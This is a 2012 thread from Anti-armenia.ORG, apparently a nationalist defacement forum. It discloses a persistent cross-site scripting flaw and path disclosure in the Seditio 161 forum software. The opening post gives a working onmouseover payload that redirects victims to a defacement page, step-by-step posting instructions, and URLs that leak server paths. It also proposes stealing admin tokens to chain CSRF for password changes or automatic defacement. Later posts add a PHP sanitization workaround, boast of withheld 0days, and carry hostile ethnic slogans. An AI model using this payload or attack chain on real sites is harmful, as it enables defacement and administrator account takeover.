Anti-armenia.ORG - Forumlar - Seditio 161 Persistent XSS/Path/Info disclosure



Istifadəçi
     2012-03-28 19:33 GMT                 

BlackMinD


Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Kod:
==========================================================
Vulnerable Software: seditio-build161
==========================================================
Downloaded from:http://neocrome.net/page.php?id=2447&a=dl

# md5sum sed*.rar
aad96010a15f0c38e5cc321f8a91dd1b *seditio-build161.rar

Installation:Standart (i assume with default settings)

Tested:
==========================================================
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
    -> ;
+-----------+
| version() |
+-----------+
| 5.5.21    |
+-----------+
*/
==========================================================
Vuln Desc: PERSISTENT CROSS SITE SCRIPTING:
==========================================================
Exploitation:
Create new topic(/forums.php?m=newtopic&s=1)
using the following details:

Topic Title: Whatever you want.
Topic Description: Whatever you want.
Body:
Inject this:
<a href="#" onmouseover="alert('You have Been Pwned) Meh Meh');window.top.location.href='http://defaced.tld/herewego.html'">You do not need click here!I will click it for you) Of course I ll pwn you)))</a>

Post the topic.

Then you'll see it as plaintext for first time.
Click the *EDIT* button but do not touch anything after this and simply Push the *UPDATE* button.
After update you'll return to your post.Try to over your mouse over the link.

Same rules and exploitation also applies to *Reply* section.
Remember you do not need touch anything after *edit* button you need only UPDATE the topic with your "payload" and thats all.
@Print screen on success pwn:

http://s43.radikal.ru/i099/1203/5d/2e2dfa119083.png

Kod:
Other attacks also possible using XSS to steal security tokens and exploitate CSRF (change password or deface site automatically) using
document.body.innerHTML(to steal administrator tokens)
==========================================================
Ok now about Info And Path Disclosure:
Try to Direct access:(Also previous versions too suffers from Info and Path disclosure)

http://192.168.0.15/learn/9/seditio/view.php

Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21
@http://www.neocrome.net/view.php

http://192.168.0.15/learn/9/seditio/plugins/contact/lang/contact.en.lang.php

Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\plugins\contact\lang\contact.en.lang.php on line 37


http://192.168.0.15/learn/9/seditio/system/lang/en/main.lang.php
Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\main.lang.php on line 450


http://192.168.0.15/learn/9/seditio/system/lang/en/message.lang.php


Notice: Undefined variable: usr in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 37

Notice: Undefined variable: num in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 104
==============================================================================================================================
http://192.168.0.15/learn/9/seditio/system/core/view/view.inc.php
Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21

@http://www.neocrome.net/system/core/view/view.inc.php

===============================================================================================================================
Info disclosure:
http://192.168.0.15/learn/9/seditio/docs/new/seditio-createnew-160.sql
http://192.168.0.15/learn/9/seditio/docs/upgrade/sedito_convert_to_utf8.optional.sql

http://192.168.0.15/learn/9/seditio/system/install/install.parser.sql
IMO Needs at least simply .htaccess rule to protect from eyes this files.
===============================================================================================================================

/AkaStep  ^_^
1332959725



Qısacası:
seditio 161 də(axırıncı stabil versiya sayılır Persistent XSS yəni dayanıqlı CROSS SİTE SCRİPTİNG VULN(Xüsusilə seditiodakı adminin tokenləri fırlatmağa
və növbəri addımlarda CSRF vasitəsilə adminin forumdan pozulmasından tutmuş passının dəyişilməsinə qədər etmək olar)
Getdi 0day olmağa)))

Ana VƏTƏN!
Anti-armenia.ORG
     
 

Istifadəçi
     2012-03-28 20:00 GMT                 

K0K4!N


İstifadəçi
Mesaj Sayı : 115
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 35
Mesaj :

Mövzunu Paylaş!


Təşhəkkür BRO Bundan Sonra üz turarlar Bulara
Əmaya Hörmət

Anti-armenia.ORG
     
 

Istifadəçi
     2012-03-28 20:07 GMT                 

Lion


İstifadəçi
Mesaj Sayı : 1
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Çox sağol

Anti-armenia.ORG
     
 

Istifadəçi
     2012-03-28 20:07 GMT                 

MCH


Gold
Mesaj Sayı : 58
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Meh Meh yerinə meeeeeeeeeeeeeeeee yazmaq olar?

Bundan qorunma yolunuda yaz amma təkcə mənə

Birdən tanımarsan mənəm MCH

Anti-armenia.ORG
     
 

Istifadəçi
     2012-03-28 20:27 GMT                 

Dr.Geheim


İstifadəçi
Mesaj Sayı : 93
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : вα∂ ѕ¢нωαℓвα¢н
Ölkə :
Məslək : ιηƒσямαтιє ∂ιєνєη
Yaş : 36
Mesaj :

Mövzunu Paylaş!


Maraqlı bir açıqdır CSRF açığını test etmişdik PM də işləkdir buda işləkdir demək. Təşəkkür.

νєяgєєт мє ηιєт..!
Anti-armenia.ORG
     
 

Istifadəçi
     2012-03-29 05:18 GMT                 

MetaizM


Gold
Mesaj Sayı : 175
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   5  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Special Bro )))
http://s019.radikal.ru/i613/1203/1e/ae9753fee2bb.jpg

Qeyd edim indi fikir verdim stepin tapdıqı başqa birşeydir mənim tapdıqım başqa

Səbəb
TinyMCE Hərşeyin içinə ... qoyur
belə düşünürəm öz canında var bu bir əmması varkı tinymce qurublar oda poxalayıb
mən admin panelden tinymce settings`dən istifadəçi və administrator moder qruplarına micro verdim bu zaman html kod vs. inject etmək olmur
ama tinymce konfiqurasından anlayan varsa yenədə bypass edəcək mən yenədə bypass etdim ən yaxşı variyant tinymce redd eləməkdir!

Anti-armenia.ORG
     
 

Istifadəçi
     2012-03-29 11:00 GMT                 

Ferid23


Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Çox sağol qaqa gözəl işdir!
Bundan sonra yəqinki hamı seditio 1.61 işlədər))

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
     
 

Istifadəçi
     2012-03-29 11:26 GMT                 

LocaL


Gold
Mesaj Sayı : 141
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Badu Kubə
Ölkə :
Məslək : ....
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkür qaqa

Seditoda heç tinymce işə yaramır. həmişəki kimi textboxer 2.0 4ever

Çakıl taşlı yollar yordu beni, keşke yürüse yanımda bişr-i hafi...
Anti-armenia.ORG
     
 

Istifadəçi
     2012-03-29 22:48 GMT                 

BlackMinD


Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Problem əslində Tinymce də deyile functions.php-dəki
sed_cc() funksiyasındadır.
Faktiki həmin funksiyadan:

Kod:
array('{', '<', '>' , '$', '\'', '"', '\\', '&amp;', '&nbsp;'),
array('&褳', '<', '>', '&補', '&裟', '"', '&จ', '&amp;amp;', '&amp;nbsp;'), $text);
;[/code]

Bununla ancaq uşaq başı aldatmaq olar.

Bütün bu problemlər ondan yaranıbki Proqrammist (Oliver) çalışıb Tinymce ilə kodu optimizə etsin edə blməyib deyərdim lazımı qədərində.
1cisi sanitization özünüz görürsünüz nə gündə alınıb.
2cisi Client Side Validasiyaya əsaslanıb.
Nəticədə də HTML code injection+XSS çıxıb ortaya.


MCH fix istəyir (Meeee xD)
@http://pastebin.com/C3TpmELg

Hələlik workaroundMəhz elə bu funksiya sed_cc() $_POST zaprosdan gələn client side inputu sanitizasiya etməli idi amma eləmirdi)


[code]

/* ------------------ */

function sed_cc($text)
{
/*
system/functions.php
*/
$text = preg_replace('/&#([0-9]{2,4});/is','&#$1;',$text);
$text = str_replace(
array('{', '<', '>' , '$', '\'', '"', '\\', '&amp;', '&nbsp;'),
array('&褳', '<', '>', '&補', '&裟', '"', '&จ', '&amp;amp;', '&amp;nbsp;'), $text);

/* WORKAROUND */
$text=htmlentities($text,ENT_QUOTES,"UTF-8");
$text=str_replace(array('&amp;lt;blockquote&amp;gt;','&amp;lt;/blockquote&amp;gt;','&amp;lt;strong&amp;gt;','&amp;lt;/strong&amp;gt;','&amp;lt;br /&amp;gt;',
'&amp;lt;a href=&amp;quot;','&amp;quot;&amp;gt;',
'&amp;lt;/a&amp;gt;','&amp;lt;pre&amp;gt;','&amp;lt;/pre&amp;gt;'),
array('<br><blockquote>','</blockquote><br><br>','<strong>',
'</strong><br>','','','','','',''),$text);
return($text);
/* EOF */

}

/* ------------------ */
[/code]

Digər tərəfdən deyimki Seditio 161 tamamilə zibil alınıb.
Hələ bu 0day xss dən başqa digər 2sini də tapmışam amma private saxlayıram (Lazım olar)
Üstəlik başdan ayağa İnfo Disclosuredir.
Adi inputboxlarda uzun uzadı aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
basın görəcəksiniz ki application özünü expose edir columnun adını verir.

Deyərdim Oliver Basməmmədi yazıb bunu.At getsin...


Xəbər verdim özünə də deyir baxacağam.Nə qədər sadə səslənir: Seditio artıq ölüb.

Bu da POC:

http://packetstormsecurity.org/files/111320/Seditio-Build-161-Cross-Site-Scripting-Information-Disclosure.html

Ana VƏTƏN!
Anti-armenia.ORG
     
 

Istifadəçi
     2012-03-30 11:10 GMT                 

TheRock


Gold
Mesaj Sayı : 71
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : xsecurity
Yaş :
Mesaj :

Mövzunu Paylaş!


yaxsi olardiki seditionu seditio-eklenti.com uzerinden takib edesiniz. Olivierin cox sehvlerini seditio-eklenti grubu 165 versiyasinda baglayib.

AATeam | EH
Anti-armenia.ORG
     
 

Istifadəçi
     2012-03-30 18:00 GMT                 

MATADOR


Banned
Mesaj Sayı : 13
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 36
Mesaj :

Mövzunu Paylaş!


mene chatmadi. ama. neyse. yenede movzuya gore emeye hormet olaraq tewekkur

Anti-armenia.ORG
     
 

 
Site By: Ferid23 | Designed: MCH & FERID23  | Site: Anti-armenia.ORG